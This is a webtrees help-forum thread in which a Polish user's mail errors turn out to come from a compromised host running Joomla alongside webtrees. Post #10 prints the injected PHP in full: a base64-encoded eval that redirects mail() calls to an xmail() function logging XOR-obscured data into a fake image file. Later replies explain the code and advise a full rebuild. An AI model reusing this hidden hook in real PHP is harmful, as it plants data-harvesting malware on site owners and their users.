Web based family history software

This Help forum is for issues relates to the latest release (1.4.6). For issues related to beta or git version please use their own Help forum.
Before asking for help please read "How to request help" by clicking on that tab above here.

Question Poczta nie działa

• Stan
  • Topic Author
  • Visitor
  • Visitor
10 years 5 months ago #1 by Stan
Poczta nie działa was created by Stan
Witam serdecznie! czy ktos moze się spotkał z takim problemem że nie można wysłać poczty ze strony ani nie dochodzą maile o rejestracji nowych uzytkowników. Otrzymuje taki oto komunikat:
Fatal error: Cannot redeclare xmail() (previously declared in /homez.42/stanicki/www/krewni1/message.php:1) in /homez.42/stanicki/www/krewni1/includes/authentication.php on line 1

Bardzo proszę o pomoc

Please Log in or Create an account to join the conversation.

• fisharebest
  • Away
  • Administrator
  • Administrator
More
10 years 5 months ago #2 by fisharebest
Replied by fisharebest on topic Poczta nie działa
webtrees does not use xmail()

This is not webtrees code.

Perhaps your site has been hacked?

---

webtrees nie korzysta xmail ()

To nie kod webtrees jest.

Być może Twoja witryna została zaatakowana przez hake

Greg Roach - greg@subaqua.co.uk - @fisharebest@phpc.social - fisharebest.webtrees.net

• Stan
  • Topic Author
  • Visitor
  • Visitor
10 years 5 months ago #3 by Stan
Replied by Stan on topic Poczta nie działa
dziękuje za odpowiedź ale teraz to dopiero jest problem jesli to atak hakerski! Zupełnie nie iwme od czego zacząć? Moze ktos już spotkał się z problemem?

• bertkoor
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
More
10 years 5 months ago #4 by bertkoor
Replied by bertkoor on topic Poczta nie działa
You can start with comparing the scripts you have installed with the scripts as they are in the original distribution.
A good tool for that is e.g. BeyondCompare by Scooter Software.
Then trace back what is changed on your site and how that was done.
Is there anything else installed on your domain except webtrees?

stamboom.BertKoor.nl runs on webtrees v1.7.13

• Stan
  • Topic Author
  • Visitor
  • Visitor
10 years 5 months ago #5 by Stan
Tak www.stanicki.com.pl/ i webtrees jako folder w środku
Czy nadpisanie wszystkich plików z czytej instalacji rozwiązałoby problem?

• bertkoor
  • Platinum Member
  • Platinum Member
More
10 years 5 months ago #6 by bertkoor

Stan wrote: Yes www.stanicki.com.pl/ and webtrees as a folder in the middle

Sorry, I do not understand what you mean.

Stan wrote: Do you overwrite all files from the reading system would solve the problem?

Maybe it will solve it. But if you have inadequate security it can happen again.

• Stan
  • Topic Author
  • Visitor
  • Visitor
10 years 5 months ago #7 by Stan
Na serwerze mam zainstalowaną joomle 1.5.25 i na tym samym serwerze zainstalownay jest też webtrees!
jesli chodzi o nadpisanie plików z czystej instalacji czy nie spowoduje to jakiś niespodziewanych rzeczy ?

• fisharebest
  • Away
  • Administrator
  • Administrator
More
10 years 5 months ago - 10 years 5 months ago #8 by fisharebest
Replied by fisharebest on topic Poczta nie działa

jesli chodzi o nadpisanie plików z czystej instalacji czy nie spowoduje to jakiś niespodziewanych rzeczy ?

when it comes to overwrite files with a clean install or not it will cause some unexpected things?

Overwriting all the files from webtrees.zip is correct. This is the normal procedure for upgrading.

Zastępowanie wszystkich plików z webtrees.zip jest prawidłowe. To jest normalna procedura aktualizacji.

Greg Roach - greg@subaqua.co.uk - @fisharebest@phpc.social - fisharebest.webtrees.net
Last edit: 10 years 5 months ago by fisharebest.

• bertkoor
  • Platinum Member
  • Platinum Member
More
10 years 5 months ago #9 by bertkoor

Stan wrote: On the server I have installed Joomla 5.1.25 and on the same server is also webtrees zainstalownay!

So it is also possible that the error came from Joomla and NOT from webtrees at all!
How do you keep webtrees and Joomla separated? I think you cannot put both in the same directory folder.

Stan wrote: when it comes to overwrite files with a clean install or not it will cause some unexpected things?

It depends on what is wrong. If you make a backup of everything (also your database) then you should be able to restore just in case.
So there is nothing to lose. But I think this is not a hack, but mixing webtrees and Joomla went wrong.
What was first, webtrees or Joomla? Did it run OK at all?

• Stan
  • Topic Author
  • Visitor
  • Visitor
10 years 5 months ago #10 by Stan
taki komunikat Fatal error: Cannot redeclare xmail() (previously declared in /homez.42/stanicki/www/krewni1/message.php:1) in /homez.42/stanicki/www/krewni1/library/phpmailer/class.phpmailer.php on line 1

tutaj w pliku
<?php /* 242322b7e7530b829b84d798e90b0482 */ eval(base64_decode('Zm9yZWFjaCAoJF9QT1NUIGFzICRwID0+ICR2KSB7IA0KCWlmIChwcmVnX21hdGNoKCcvXGJtYWlsXHMqXCgvJywgJHYgKSkgeyANCgkJJHYgPSBwcmVnX3JlcGxhY2UoJy9cYm1haWxccypcKC8nLCAneG1haWwoJywgJHYgKTsgDQoJCSRfUE9TVFskcF0gPSAkdjsgDQoJCSRfUkVRVUVTVFskcF0gPSAkdjsNCgl9IGVsc2UgaWYgKHByZWdfbWF0Y2goJy9cYm1haWxccypcKC8nLCBiYXNlNjRfZGVjb2RlKCR2KSkpeyANCgkJJHYgPSBwcmVnX3JlcGxhY2UoJy9cYm1haWxccypcKC8nLCAneG1haWwoJywgYmFzZTY0X2RlY29kZSgkdikpOyANCgkJJF9QT1NUWyRwXSA9IGJhc2U2NF9lbmNvZGUoJHYpOyANCgkJJF9SRVFVRVNUWyRwXSA9IGJhc2U2NF9lbmNvZGUoJHYpOw0KCX0NCn0NCg==')); function xmail () { $a=func_get_args(); file_put_contents('/homez.42/stanicki/www/plugins/editors/jce/tiny_mce/themes/advanced/skins/o2k7/img82886.jpg', x($_SERVER. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;} ?><?php

Gdzie może być bląd?

More
10 years 5 months ago #11 by vytux
Replied by vytux on topic Poczta nie działa
anything with base64_decode( in a php file will in 99% of the time will be hacked code designed to hijack your site/data

I would pretty much wipe the whole site and install everything from scratch... no I am not talking webtrees I am talking everything you have on that host.. Joomla, webtrees, etc.

and would definitely have all of your passwords changed.

Vytautas

webtrees 1.7.9 (MODS: vytux_cousins, vytux_gallery3, vytux_pages, fancy_imagebar, fancy_treeview, Ancestral fan chart)
PHP 7.1.2, MySQL 5.7.17 x86_64 GPL, Nginx (mainline)
ged.vytux.com
Help translate Vytux Modules at translate.vytux.com/

• ToyGuy
  • Live like it's Christmas every day - Santa Stephen
More
10 years 5 months ago - 10 years 5 months ago #12 by ToyGuy
Replied by ToyGuy on topic Poczta nie działa
Nothing you post appears related to webtrees and its files.
However, UNLOCK your site. Do not attempt to restrict access to the welcome/home page to every person, requiring registration.
There are problems with doing so.

Santa Stephen the Fabled Santa
Latest webtrees at MyArnolds.com
Hosted by webtreesonline.com , a division of GeneHosts LLC
MacOS 10.6.8, Apache 2.2+, PHP 5.4.16, MySQL 5.5.28
Last edit: 10 years 5 months ago by ToyGuy.

• bertkoor
  • Platinum Member
  • Platinum Member
More
10 years 5 months ago - 10 years 5 months ago #13 by bertkoor
Stan,

The piece of base64-encoded code replaces all calls to the "mail" function to a simular call to a "xmail" function declared below it.
What that does, is write whatever was supposed to be emailed into a pretend-to-be picture somewhere deep down in a part of Joomla, and then calls the original mail function. So whoever hacked your site gets access to anything that was sent by mail.
(minor correction: it only harvests the email addresses)

In your case you are a bit lucky that you have the infection twice. Function xmail is declared in two php files, while it was supposed to be declared just once.

So do follow the advice of vytux: erase everything and start new with the most recent version of all software.

Last edit: 10 years 5 months ago by bertkoor.